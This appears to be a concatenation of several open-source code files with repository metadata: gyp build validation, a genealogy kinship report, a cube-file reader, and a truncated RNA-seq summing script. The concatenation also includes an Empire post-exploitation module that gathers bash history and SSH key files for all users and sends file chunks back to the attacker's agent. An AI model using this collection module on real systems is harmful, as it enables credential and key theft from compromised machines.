for source in target_dict.get(source_key, []):
(source_root, source_extension) = os.path.splitext(source)
if source_extension.startswith("."):
source_extension = source_extension[1:]
if source_extension == rule_extension:
rule_sources.append(source)
if len(rule_sources) > 0:
rule["rule_sources"] = rule_sources
def ValidateRunAsInTarget(target, target_dict, build_file):
target_name = target_dict.get("target_name")
run_as = target_dict.get("run_as")
if not run_as:
return
if type(run_as) is not dict:
raise GypError(
"The 'run_as' in target %s from file %s should be a "
"dictionary." % (target_name, build_file)
)
action = run_as.get("action")
if not action:
raise GypError(
"The 'run_as' in target %s from file %s must have an "
"'action' section." % (target_name, build_file)
)
if type(action) is not list:
raise GypError(
"The 'action' for 'run_as' in target %s from file %s "
"must be a list." % (target_name, build_file)
)
working_directory = run_as.get("working_directory")
if working_directory and type(working_directory) is not str:
raise GypError(
"The 'working_directory' for 'run_as' in target %s "
"in file %s should be a string." % (target_name, build_file)
)
environment = run_as.get("environment")
if environment and type(environment) is not dict:
raise GypError(
"The 'environment' for 'run_as' in target %s "
"in file %s should be a dictionary." % (target_name, build_file)
)
def ValidateActionsInTarget(target, target_dict, build_file):
"""Validates the inputs to the actions in a target."""
target_name = target_dict.get("target_name")
actions = target_dict.get("actions", [])
for action in actions:
action_name = action.get("action_name")
if not action_name:
raise GypError(
"Anonymous action in target %s. "
"An action must have an 'action_name' field." % target_name
)
inputs = action.get("inputs", None)
if inputs is None:
raise GypError("Action in target %s has no inputs." % target_name)
action_command = action.get("action")
if action_command and not action_command[0]:
raise GypError("Empty action as command in target %s." % target_name)
def TurnIntIntoStrInDict(the_dict):
"""Given dict the_dict, recursively converts all integers into strings.
"""
# Use items instead of iteritems because there's no need to try to look at
# reinserted keys and their associated values.
for k, v in the_dict.items():
if type(v) is int:
v = str(v)
the_dict[k] = v
elif type(v) is dict:
TurnIntIntoStrInDict(v)
elif type(v) is list:
TurnIntIntoStrInList(v)
if type(k) is int:
del the_dict[k]
the_dict[str(k)] = v
def TurnIntIntoStrInList(the_list):
"""Given list the_list, recursively converts all integers into strings.
"""
for index, item in enumerate(the_list):
if type(item) is int:
the_list[index] = str(item)
elif type(item) is dict:
TurnIntIntoStrInDict(item)
elif type(item) is list:
TurnIntIntoStrInList(item)
def PruneUnwantedTargets(targets, flat_list, dependency_nodes, root_targets, data):
"""Return only the targets that are deep dependencies of |root_targets|."""
qualified_root_targets = []
for target in root_targets:
target = target.strip()
qualified_targets = gyp.common.FindQualifiedTargets(target, flat_list)
if not qualified_targets:
raise GypError("Could not find target %s" % target)
qualified_root_targets.extend(qualified_targets)
wanted_targets = {}
for target in qualified_root_targets:
wanted_targets[target] = targets[target]
for dependency in dependency_nodes[target].DeepDependencies():
wanted_targets[dependency] = targets[dependency]
wanted_flat_list = [t for t in flat_list if t in wanted_targets]
# Prune unwanted targets from each build_file's data dict.
for build_file in data["target_build_files"]:
if "targets" not in data[build_file]:
continue
new_targets = []
for target in data[build_file]["targets"]:
qualified_name = gyp.common.QualifiedTarget(
build_file, target["target_name"], target["toolset"]
)
if qualified_name in wanted_targets:
new_targets.append(target)
data[build_file]["targets"] = new_targets
return wanted_targets, wanted_flat_list
def VerifyNoCollidingTargets(targets):
"""Verify that no two targets in the same directory share the same name.
Arguments:
targets: A list of targets in the form 'path/to/file.gyp:target_name'.
"""
# Keep a dict going from 'subdirectory:target_name' to 'foo.gyp'.
used = {}
for target in targets:
# Separate out 'path/to/file.gyp, 'target_name' from
# 'path/to/file.gyp:target_name'.
path, name = target.rsplit(":", 1)
# Separate out 'path/to', 'file.gyp' from 'path/to/file.gyp'.
subdir, gyp = os.path.split(path)
# Use '.' for the current directory '', so that the error messages make
# more sense.
if not subdir:
subdir = "."
# Prepare a key like 'path/to:target_name'.
key = subdir + ":" + name
if key in used:
# Complain if this target is already used.
raise GypError(
'Duplicate target name "%s" in directory "%s" used both '
'in "%s" and "%s".' % (name, subdir, gyp, used[key])
)
used[key] = gyp
def SetGeneratorGlobals(generator_input_info):
# Set up path_sections and non_configuration_keys with the default data plus
# the generator-specific data.
global path_sections
path_sections = set(base_path_sections)
path_sections.update(generator_input_info["path_sections"])
global non_configuration_keys
non_configuration_keys = base_non_configuration_keys[:]
non_configuration_keys.extend(generator_input_info["non_configuration_keys"])
global multiple_toolsets
multiple_toolsets = generator_input_info["generator_supports_multiple_toolsets"]
global generator_filelist_paths
generator_filelist_paths = generator_input_info["generator_filelist_paths"]
def Load(
build_files,
variables,
includes,
depth,
generator_input_info,
check,
circular_check,
duplicate_basename_check,
parallel,
root_targets,
):
SetGeneratorGlobals(generator_input_info)
# A generator can have other lists (in addition to sources) be processed
# for rules.
extra_sources_for_rules = generator_input_info["extra_sources_for_rules"]
# Load build files. This loads every target-containing build file into
# the |data| dictionary such that the keys to |data| are build file names,
# and the values are the entire build file contents after "early" or "pre"
# processing has been done and includes have been resolved.
# NOTE: data contains both "target" files (.gyp) and "includes" (.gypi), as
# well as meta-data (e.g. 'included_files' key). 'target_build_files' keeps
# track of the keys corresponding to "target" files.
data = {"target_build_files": set()}
# Normalize paths everywhere. This is important because paths will be
# used as keys to the data dict and for references between input files.
build_files = set(map(os.path.normpath, build_files))
if parallel:
LoadTargetBuildFilesParallel(
build_files, data, variables, includes, depth, check, generator_input_info
)
else:
aux_data = {}
for build_file in build_files:
try:
LoadTargetBuildFile(
build_file, data, aux_data, variables, includes, depth, check, True
)
except Exception as e:
gyp.common.ExceptionAppend(e, "while trying to load %s" % build_file)
raise
# Build a dict to access each target's subdict by qualified name.
targets = BuildTargetsDict(data)
# Fully qualify all dependency links.
QualifyDependencies(targets)
# Remove self-dependencies from targets that have 'prune_self_dependencies'
# set to 1.
RemoveSelfDependencies(targets)
# Expand dependencies specified as build_file:*.
ExpandWildcardDependencies(targets, data)
# Remove all dependencies marked as 'link_dependency' from the targets of
# type 'none'.
RemoveLinkDependenciesFromNoneTargets(targets)
# Apply exclude (!) and regex (/) list filters only for dependency_sections.
for target_name, target_dict in targets.items():
tmp_dict = {}
for key_base in dependency_sections:
for op in ("", "!", "/"):
key = key_base + op
if key in target_dict:
tmp_dict[key] = target_dict[key]
del target_dict[key]
ProcessListFiltersInDict(target_name, tmp_dict)
# Write the results back to |target_dict|.
for key in tmp_dict:
target_dict[key] = tmp_dict[key]
# Make sure every dependency appears at most once.
RemoveDuplicateDependencies(targets)
if circular_check:
# Make sure that any targets in a.gyp don't contain dependencies in other
# .gyp files that further depend on a.gyp.
VerifyNoGYPFileCircularDependencies(targets)
[dependency_nodes, flat_list] = BuildDependencyList(targets)
if root_targets:
# Remove, from |targets| and |flat_list|, the targets that are not deep
# dependencies of the targets specified in |root_targets|.
targets, flat_list = PruneUnwantedTargets(
targets, flat_list, dependency_nodes, root_targets, data
)
# Check that no two targets in the same directory have the same name.
VerifyNoCollidingTargets(flat_list)
# Handle dependent settings of various types.
for settings_type in [
"all_dependent_settings",
"direct_dependent_settings",
"link_settings",
]:
DoDependentSettings(settings_type, flat_list, targets, dependency_nodes)
# Take out the dependent settings now that they've been published to all
# of the targets that require them.
for target in flat_list:
if settings_type in targets[target]:
del targets[target][settings_type]
# Make sure static libraries don't declare dependencies on other static
# libraries, but that linkables depend on all unlinked static libraries
# that they need so that their link steps will be correct.
gii = generator_input_info
if gii["generator_wants_static_library_dependencies_adjusted"]:
AdjustStaticLibraryDependencies(
flat_list,
targets,
dependency_nodes,
gii["generator_wants_sorted_dependencies"],
)
# Apply "post"/"late"/"target" variable expansions and condition evaluations.
for target in flat_list:
target_dict = targets[target]
build_file = gyp.common.BuildFile(target)
ProcessVariablesAndConditionsInDict(
target_dict, PHASE_LATE, variables, build_file
)
# Move everything that can go into a "configurations" section into one.
for target in flat_list:
target_dict = targets[target]
SetUpConfigurations(target, target_dict)
# Apply exclude (!) and regex (/) list filters.
for target in flat_list:
target_dict = targets[target]
ProcessListFiltersInDict(target, target_dict)
# Apply "latelate" variable expansions and condition evaluations.
for target in flat_list:
target_dict = targets[target]
build_file = gyp.common.BuildFile(target)
ProcessVariablesAndConditionsInDict(
target_dict, PHASE_LATELATE, variables, build_file
)
# Make sure that the rules make sense, and build up rule_sources lists as
# needed. Not all generators will need to use the rule_sources lists, but
# some may, and it seems best to build the list in a common spot.
# Also validate actions and run_as elements in targets.
for target in flat_list:
target_dict = targets[target]
build_file = gyp.common.BuildFile(target)
ValidateTargetType(target, target_dict)
ValidateSourcesInTarget(
target, target_dict, build_file, duplicate_basename_check
)
ValidateRulesInTarget(target, target_dict, extra_sources_for_rules)
ValidateRunAsInTarget(target, target_dict, build_file)
ValidateActionsInTarget(target, target_dict, build_file)
# Generators might not expect ints. Turn them into strs.
TurnIntIntoStrInDict(data)
# TODO(mark): Return |data| for now because the generator needs a list of
# build files that came in. In the future, maybe it should just accept
# a list, and not the whole data dict.
return [flat_list, targets, data]
|
onecoolx/picasso
|
tools/gyp/pylib/gyp/input.py
|
Python
|
bsd-3-clause
| 128,903
|
[
"VisIt"
] |
0221fafcb23edcba5643f457ee7ec39cebafc7b735a4176e9ea58c343e61c02c
|
#
# gPrime - A web-based genealogy program
#
# Copyright (C) 2007-2012 Brian G. Matherly
# Copyright (C) 2009 Gary Burton
# Contribution 2009 by Reinhard Mueller <reinhard.mueller@bytewise.at>
# Copyright (C) 2010 Jakim Friant
# Copyright (C) 2013-2014 Paul Franklin
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"""Reports/Text Reports/Kinship Report"""
#------------------------------------------------------------------------
#
# python modules
#
#------------------------------------------------------------------------
#------------------------------------------------------------------------
#
# gramps modules
#
#------------------------------------------------------------------------
from gprime.const import LOCALE as glocale
_ = glocale.translation.gettext
from gprime.errors import ReportError
from gprime.relationship import get_relationship_calculator
from gprime.plug.docgen import (IndexMark, FontStyle, ParagraphStyle,
FONT_SANS_SERIF, INDEX_TYPE_TOC,
PARA_ALIGN_CENTER)
from gprime.plug.menu import NumberOption, BooleanOption, PersonOption
from gprime.plug.report import Report
from gprime.plug.report import utils
from gprime.plug.report import MenuReportOptions
from gprime.plug.report import stdoptions
from gprime.utils.db import get_birth_or_fallback, get_death_or_fallback
from gprime.proxy import CacheProxyDb
from gprime.display.name import displayer as _nd
#------------------------------------------------------------------------
#
# KinshipReport
#
#------------------------------------------------------------------------
class KinshipReport(Report):
""" Kinship Report """
def __init__(self, database, options, user):
"""
Create the KinshipReport object that produces the report.
The arguments are:
database - the GRAMPS database instance
options - instance of the Options class for this report
user - a gen.user.User() instance
This report needs the following parameters (class variables)
that come in the options class.
maxdescend - Maximum generations of descendants to include.
maxascend - Maximum generations of ancestors to include.
incspouses - Whether to include spouses.
inccousins - Whether to include cousins.
incaunts - Whether to include aunts/uncles/nephews/nieces.
pid - The GID of the center person for the report.
name_format - Preferred format to display names
incl_private - Whether to include private data
living_people - How to handle living people
years_past_death - Consider as living this many years after death
"""
Report.__init__(self, database, options, user)
menu = options.menu
lang = menu.get_option_by_name('trans').get_value()
rlocale = self.set_locale(lang)
stdoptions.run_private_data_option(self, menu)
stdoptions.run_living_people_option(self, menu, rlocale)
self.database = CacheProxyDb(self.database)
self.__db = self.database
self.max_descend = menu.get_option_by_name('maxdescend').get_value()
self.max_ascend = menu.get_option_by_name('maxascend').get_value()
self.inc_spouses = menu.get_option_by_name('incspouses').get_value()
self.inc_cousins = menu.get_option_by_name('inccousins').get_value()
self.inc_aunts = menu.get_option_by_name('incaunts').get_value()
pid = menu.get_option_by_name('pid').get_value()
self.person = self.database.get_person_from_gid(pid)
if self.person is None:
raise ReportError(_("Person %s is not in the Database") % pid)
stdoptions.run_name_format_option(self, menu)
self.rel_calc = get_relationship_calculator(reinit=True,
clocale=rlocale)
self.kinship_map = {}
self.spouse_map = {}
def write_report(self):
"""
The routine the actually creates the report. At this point, the document
is opened and ready for writing.
"""
pname = self._name_display.display(self.person)
self.doc.start_paragraph("KIN-Title")
# feature request 2356: avoid genitive form
title = self._("Kinship Report for %s") % pname
mark = IndexMark(title, INDEX_TYPE_TOC, 1)
self.doc.write_text(title, mark)
self.doc.end_paragraph()
if self.inc_spouses:
spouse_handles = self.get_spouse_handles(self.person.get_handle())
if spouse_handles:
self.write_people(self._("Spouses"), spouse_handles)
# Collect all descendants of the person
self.traverse_down(self.person.get_handle(), 0, 1)
# Collect all ancestors/aunts/uncles/nephews/cousins of the person
self.traverse_up(self.person.get_handle(), 1, 0)
# Write Kin
for Ga, Gbs in self.kinship_map.items():
for Gb in Gbs:
# To understand these calculations, see:
# http://en.wikipedia.org/wiki/Cousin#Mathematical_definitions
_x_ = min(Ga, Gb)
_y_ = abs(Ga - Gb)
# Skip unrequested people
if _x_ == 1 and _y_ > 0 and not self.inc_aunts:
continue
elif _x_ > 1 and not self.inc_cousins:
continue
get_rel_str = self.rel_calc.get_plural_relationship_string
title = get_rel_str(Ga, Gb, in_law_b=False)
self.write_people(self._(title), self.kinship_map[Ga][Gb])
if (self.inc_spouses and
Ga in self.spouse_map and
Gb in self.spouse_map[Ga]):
title = get_rel_str(Ga, Gb, in_law_b=True)
self.write_people(self._(title), self.spouse_map[Ga][Gb])
def traverse_down(self, person_handle, Ga, Gb, skip_handle=None):
"""
Populate a map of arrays containing person handles for the descendants
of the passed person. This function calls itself recursively until it
reaches max_descend.
Parameters:
person_handle: the handle of the person to go to next
Ga: The number of generations from the main person to the common
ancestor. This should be incremented when going up generations, and
left alone when going down generations.
Gb: The number of generations from this person (person_handle) to the
common ancestor. This should be incremented when going down
generations and set back to zero when going up generations.
skip_handle: an optional handle to skip when going down. This is useful
to skip the descendant that brought you this generation in the first
place.
"""
for child_handle in self.get_children_handles(person_handle):
if child_handle != skip_handle:
self.add_kin(child_handle, Ga, Gb)
if self.inc_spouses:
for spouse_handle in self.get_spouse_handles(child_handle):
self.add_spouse(spouse_handle, Ga, Gb)
if Gb < self.max_descend:
self.traverse_down(child_handle, Ga, Gb+1)
def traverse_up(self, person_handle, Ga, Gb):
"""
Populate a map of arrays containing person handles for the ancestors
of the passed person. This function calls itself recursively until it
reaches max_ascend.
Parameters:
person_handle: the handle of the person to go to next
Ga: The number of generations from the main person to the common
ancestor. This should be incremented when going up generations, and
left alone when going down generations.
Gb: The number of generations from this person (person_handle) to the
common ancestor. This should be incremented when going down
generations and set back to zero when going up generations.
"""
parent_handles = self.get_parent_handles(person_handle)
for parent_handle in parent_handles:
self.add_kin(parent_handle, Ga, Gb)
self.traverse_down(parent_handle, Ga, Gb+1, person_handle)
if Ga < self.max_ascend:
self.traverse_up(parent_handle, Ga+1, 0)
def add_kin(self, person_handle, Ga, Gb):
"""
Add a person handle to the kin map.
"""
if Ga not in self.kinship_map:
self.kinship_map[Ga] = {}
if Gb not in self.kinship_map[Ga]:
self.kinship_map[Ga][Gb] = []
if person_handle not in self.kinship_map[Ga][Gb]:
self.kinship_map[Ga][Gb].append(person_handle)
def add_spouse(self, spouse_handle, Ga, Gb):
"""
Add a person handle to the spouse map.
"""
if Ga not in self.spouse_map:
self.spouse_map[Ga] = {}
if Gb not in self.spouse_map[Ga]:
self.spouse_map[Ga][Gb] = []
if spouse_handle not in self.spouse_map[Ga][Gb]:
self.spouse_map[Ga][Gb].append(spouse_handle)
def get_parent_handles(self, person_handle):
"""
Return an array of handles for all the parents of the
given person handle.
"""
parent_handles = []
person = self.__db.get_person_from_handle(person_handle)
family_handle = person.get_main_parents_family_handle()
if family_handle:
family = self.__db.get_family_from_handle(family_handle)
father_handle = family.get_father_handle()
if father_handle:
parent_handles.append(father_handle)
mother_handle = family.get_mother_handle()
if mother_handle:
parent_handles.append(mother_handle)
return parent_handles
def get_spouse_handles(self, person_handle):
"""
Return an array of handles for all the spouses of the
given person handle.
"""
spouses = []
person = self.__db.get_person_from_handle(person_handle)
for family_handle in person.get_family_handle_list():
family = self.__db.get_family_from_handle(family_handle)
father_handle = family.get_father_handle()
mother_handle = family.get_mother_handle()
spouse_handle = None
if mother_handle and father_handle == person_handle:
spouse_handle = mother_handle
elif father_handle and mother_handle == person_handle:
spouse_handle = father_handle
if spouse_handle and spouse_handle not in spouses:
spouses.append(spouse_handle)
return spouses
def get_children_handles(self, person_handle):
"""
Return an array of handles for all the children of the
given person handle.
"""
children = []
person = self.__db.get_person_from_handle(person_handle)
for family_handle in person.get_family_handle_list():
family = self.__db.get_family_from_handle(family_handle)
for child_ref in family.get_child_ref_list():
children.append(child_ref.get_reference_handle())
return children
def write_people(self, title, people_handles):
"""
Write information about a group of people - including the title.
"""
cap_title = title[0].upper() + title[1:]
subtitle = "%s (%d)" % (cap_title, len(people_handles))
self.doc.start_paragraph("KIN-Subtitle")
mark = IndexMark(cap_title, INDEX_TYPE_TOC, 2)
self.doc.write_text(subtitle, mark)
self.doc.end_paragraph()
list(map(self.write_person, people_handles))
def write_person(self, person_handle):
"""
Write information about the given person.
"""
person = self.database.get_person_from_handle(person_handle)
name = self._name_display.display(person)
mark = utils.get_person_mark(self.database, person)
birth_date = ""
birth = get_birth_or_fallback(self.database, person)
if birth:
birth_date = self._get_date(birth.get_date_object())
death_date = ""
death = get_death_or_fallback(self.database, person)
if death:
death_date = self._get_date(death.get_date_object())
dates = ''
if birth_date or death_date:
dates = self._(" (%(birth_date)s - %(death_date)s)"
) % {'birth_date' : birth_date,
'death_date' : death_date}
self.doc.start_paragraph('KIN-Normal')
self.doc.write_text(name, mark)
self.doc.write_text(dates)
self.doc.end_paragraph()
#------------------------------------------------------------------------
#
# KinshipOptions
#
#------------------------------------------------------------------------
class KinshipOptions(MenuReportOptions):
"""
Defines options and provides handling interface.
"""
def __init__(self, name, dbase):
self.__db = dbase
self.__pid = None
MenuReportOptions.__init__(self, name, dbase)
def get_subject(self):
""" Return a string that describes the subject of the report. """
gid = self.__pid.get_value()
person = self.__db.get_person_from_gid(gid)
return _nd.display(person)
def add_menu_options(self, menu):
"""
Add options to the menu for the kinship report.
"""
category_name = _("Report Options")
self.__pid = PersonOption(_("Center Person"))
self.__pid.set_help(_("The center person for the report"))
menu.add_option(category_name, "pid", self.__pid)
stdoptions.add_name_format_option(menu, category_name)
stdoptions.add_private_data_option(menu, category_name)
stdoptions.add_living_people_option(menu, category_name)
maxdescend = NumberOption(_("Max Descendant Generations"), 2, 1, 20)
maxdescend.set_help(_("The maximum number of descendant generations"))
menu.add_option(category_name, "maxdescend", maxdescend)
maxascend = NumberOption(_("Max Ancestor Generations"), 2, 1, 20)
maxascend.set_help(_("The maximum number of ancestor generations"))
menu.add_option(category_name, "maxascend", maxascend)
incspouses = BooleanOption(_("Include spouses"), True)
incspouses.set_help(_("Whether to include spouses"))
menu.add_option(category_name, "incspouses", incspouses)
inccousins = BooleanOption(_("Include cousins"), True)
inccousins.set_help(_("Whether to include cousins"))
menu.add_option(category_name, "inccousins", inccousins)
incaunts = BooleanOption(_("Include aunts/uncles/nephews/nieces"), True)
incaunts.set_help(_("Whether to include aunts/uncles/nephews/nieces"))
menu.add_option(category_name, "incaunts", incaunts)
stdoptions.add_localization_option(menu, category_name)
def make_default_style(self, default_style):
"""Make the default output style for the Kinship Report."""
font = FontStyle()
font.set_size(16)
font.set_type_face(FONT_SANS_SERIF)
font.set_bold(1)
para = ParagraphStyle()
para.set_header_level(1)
para.set_bottom_border(1)
para.set_bottom_margin(utils.pt2cm(8))
para.set_font(font)
para.set_alignment(PARA_ALIGN_CENTER)
para.set_description(_("The style used for the title of the page."))
default_style.add_paragraph_style("KIN-Title", para)
font = FontStyle()
font.set_size(12)
font.set_bold(True)
para = ParagraphStyle()
para.set_header_level(3)
para.set_font(font)
para.set_top_margin(utils.pt2cm(6))
para.set_description(_('The basic style used for sub-headings.'))
default_style.add_paragraph_style("KIN-Subtitle", para)
font = FontStyle()
font.set_size(10)
para = ParagraphStyle()
para.set_font(font)
para.set_left_margin(0.5)
para.set_description(_('The basic style used for the text display.'))
default_style.add_paragraph_style("KIN-Normal", para)
|
sam-m888/gprime
|
gprime/plugins/textreport/kinshipreport.py
|
Python
|
gpl-2.0
| 17,158
|
[
"Brian"
] |
cae3f56230289efd1779a392868bdb2246cce011c91402850287ac9cfcbc82f8
|
# -*- coding: utf-8 -*-
# HORTON: Helpful Open-source Research TOol for N-fermion systems.
# Copyright (C) 2011-2016 The HORTON Development Team
#
# This file is part of HORTON.
#
# HORTON is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# HORTON is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>
#
# --
'''Gaussian cube file format'''
import numpy as np
from horton.cext import Cell
from horton.grid.cext import UniformGrid
__all__ = ['load_cube', 'dump_cube']
def _read_cube_header(f):
# Read the title
title = f.readline().strip()
# skip the second line
f.readline()
def read_grid_line(line):
"""Read a grid line from the cube file"""
words = line.split()
return (
int(words[0]),
np.array([float(words[1]), float(words[2]), float(words[3])], float)
# all coordinates in a cube file are in atomic units
)
# number of atoms and origin of the grid
natom, origin = read_grid_line(f.readline())
# numer of grid points in A direction and step vector A, and so on
shape0, axis0 = read_grid_line(f.readline())
shape1, axis1 = read_grid_line(f.readline())
shape2, axis2 = read_grid_line(f.readline())
shape = np.array([shape0, shape1, shape2], int)
axes = np.array([axis0, axis1, axis2])
cell = Cell(axes*shape.reshape(-1,1))
ugrid = UniformGrid(origin, axes, shape, np.ones(3, int))
def read_coordinate_line(line):
"""Read an atom number and coordinate from the cube file"""
words = line.split()
return (
int(words[0]), float(words[1]),
np.array([float(words[2]), float(words[3]), float(words[4])], float)
# all coordinates in a cube file are in atomic units
)
numbers = np.zeros(natom, int)
pseudo_numbers = np.zeros(natom, float)
coordinates = np.zeros((natom, 3), float)
for i in xrange(natom):
numbers[i], pseudo_numbers[i], coordinates[i] = read_coordinate_line(f.readline())
# If the pseudo_number field is zero, we assume that no effective core
# potentials were used.
if pseudo_numbers[i] == 0.0:
pseudo_numbers[i] = numbers[i]
return title, coordinates, numbers, cell, ugrid, pseudo_numbers
def _read_cube_data(f, ugrid):
data = np.zeros(tuple(ugrid.shape), float)
tmp = data.ravel()
counter = 0
while True:
line = f.readline()
if len(line) == 0:
break
words = line.split()
for word in words:
tmp[counter] = float(word)
counter += 1
return data
def load_cube(filename):
'''Load data from a cube file
**Arguments:**
filename
The name of the cube file
**Returns** a dictionary with ``title``, ``coordinates``, ``numbers``,
``cube_data``, ``grid``, ``pseudo_numbers``.
'''
with open(filename) as f:
title, coordinates, numbers, cell, ugrid, pseudo_numbers = _read_cube_header(f)
data = _read_cube_data(f, ugrid)
return {
'title': title,
'coordinates': coordinates,
'numbers': numbers,
'cell': cell,
'cube_data': data,
'grid': ugrid,
'pseudo_numbers': pseudo_numbers,
}
def _write_cube_header(f, title, coordinates, numbers, ugrid, pseudo_numbers):
print >> f, title
print >> f, 'OUTER LOOP: X, MIDDLE LOOP: Y, INNER LOOP: Z'
natom = len(numbers)
x, y, z = ugrid.origin
print >> f, '%5i % 11.6f % 11.6f % 11.6f' % (natom, x, y, z)
rvecs = ugrid.grid_rvecs
for i in xrange(3):
x, y, z = rvecs[i]
print >> f, '%5i % 11.6f % 11.6f % 11.6f' % (ugrid.shape[i], x, y, z)
for i in xrange(natom):
q = pseudo_numbers[i]
x, y, z = coordinates[i]
print >> f, '%5i % 11.6f % 11.6f % 11.6f % 11.6f' % (numbers[i], q, x, y, z)
def _write_cube_data(f, cube_data):
counter = 0
for value in cube_data.flat:
f.write(' % 12.5E' % value)
if counter%6 == 5:
f.write('\n')
counter += 1
def dump_cube(filename, data):
'''Write a IOData to a .cube file.
**Arguments:**
filename
The name of the file to be written. This usually the extension
".cube".
data
An IOData instance. Must contain ``coordinates``, ``numbers``,
``grid``, ``cube_data``. May contain ``title``, ``pseudo_numbers``.
'''
with open(filename, 'w') as f:
if not isinstance(data.grid, UniformGrid):
raise ValueError('The system grid must be a UniformGrid instance.')
title = getattr(data, 'title', 'Created with HORTON')
_write_cube_header(f, title, data.coordinates, data.numbers, data.grid, data.pseudo_numbers)
_write_cube_data(f, data.cube_data)
|
crisely09/horton
|
horton/io/cube.py
|
Python
|
gpl-3.0
| 5,383
|
[
"Gaussian"
] |
0e32547ae0b3a7be6e8bcbc0db0a621fd33d81f45d798c51a106bdc38c9c5f99
|
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Linux PillageUser',
# list of one or more authors for the module
'Author': ['@harmj0y'],
# more verbose multi-line description of the module
'Description': ("Pillages the current user for their bash_history, ssh known hosts, "
"recent folders, etc. "),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : "",
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : True,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': []
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'Sleep' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : "Switch. Sleep the agent's normal interval between downloads, otherwise use one blast.",
'Required' : False,
'Value' : 'True'
},
'AllUsers' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : "Switch. Run for all users (needs root privileges!)",
'Required' : False,
'Value' : 'False'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
sleep = self.options['Sleep']['Value']
allUsers = self.options['AllUsers']['Value']
script = """
import os
# custom function to send downloac packets back
def downloadFile(path):
import os
filePath = os.path.expanduser(path)
if os.path.isfile(filePath):
offset = 0
size = os.path.getsize(filePath)
while True:
partIndex = 0
# get 512kb of the given file starting at the specified offset
encodedPart = get_file_part(filePath, offset)
partData = "%%s|%%s|%%s" %%(partIndex, filePath, encodedPart)
if not encodedPart or encodedPart == '': break
sendMessage(encodePacket(41, partData))
# if we're choosing to sleep between file part downloads
if "%(sleep)s".lower() == "true":
global minSleep
global maxSleep
minSleep = (1.0-jitter)*delay
maxSleep = (1.0+jitter)*delay
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
partIndex += 1
offset += 5120000
searchPaths = ['/.bash_history']
if "%(allUsers)s".lower() == "true":
d='/home/'
userPaths = [os.path.join(d,o) for o in os.listdir(d) if os.path.isdir(os.path.join(d,o))]
userPaths += ["/root/"]
else:
userPaths = ['~/']
for userPath in userPaths:
for searchPath in searchPaths:
#downloadFile(userPath + searchPath)
print userPath + searchPath
# grab all .ssh files
filePath = os.path.expanduser(userPath + '/.ssh/')
if os.path.exists(filePath):
sshFiles = [f for f in os.listdir(filePath) if os.path.isfile(os.path.join(filePath, f))]
for sshFile in sshFiles:
# downloadFile(userPath + '/.ssh/' + sshFile)
print userPath + '/.ssh/' + sshFile
print "pillaging complete"
""" % {'sleep': sleep, 'allUsers': allUsers}
return script
|
EmpireProject/Empire
|
lib/modules/python/collection/linux/pillage_user.py
|
Python
|
bsd-3-clause
| 5,008
|
[
"BLAST"
] |
7b665c36bc3f0de941a7c5db1c9a547dbc4496339cfd3b8e2d78bd2d8379d9ee
|
import os
import sys
from utils import *
import operator
from time import localtime, strftime
import argparse
import re
import sh
import pandas as pd
# cd /nfs3/PHARM/Morgun_Lab/richrr/Type2_Diabetes/RNA-Seq/analysis/summarize_per_sample
# usage: python ~/Morgun_Lab/richrr/scripts/python/sum_data_from_lanes_per_sample.py -i data_per_lane.txt -b rnaseqil
#cd /nfs3/PHARM/Morgun_Lab/richrr/Milena_data_050917/analysis
# python ~/Morgun_Lab/richrr/scripts/python/sum_data_from_lanes_per_sample.py -i suumarized-htseq-results.csv -b ignore -d , -s 5
# sort it first on the prefix and then suffix of the "strng"
def sort_headers(names, strng):
return sorted(names, key=lambda x: (int(x.split(strng)[0]), int(x.split(strng)[1])))
def main(args):
# extract the statistics from the log
parser = argparse.ArgumentParser(description='sum the number of reads from different lanes per sample. The current delimiter is _L00')
parser.add_argument('-i', '--infile')
parser.add_argument('-o', '--outfile', default="summed-values.txt") # output filename
parser.add_argument('-d', '--delimiter', default='\t') # delimiter for file
parser.add_argument('-l', '--lanedelimit', default='_L00') # delimiter for identifying lanes
parser.add_argument('-r', '--rowid', default=0) # 0-based index of column to be used for row id
parser.add_argument('-s', '--skiprowsafterheader', default=0) # skip the top x rows using index after header
# to skip three rows following header, give -s 3
# so in htseq results it could be the top 5 rows after header with __, give -s 5
parser.add_argument('-b', '--buffr') # the buffer string is used to split the sample names and used
# during arranging samples order in output file
# for samples named 11rnaseq1, 11rnaseq2, 12rnaseq1, ...the -b is rnaseq
# the samples are first sorted using prefix of rnaseq and then suffix of rnaseq
args = parser.parse_args()
if len(sys.argv)==1 :
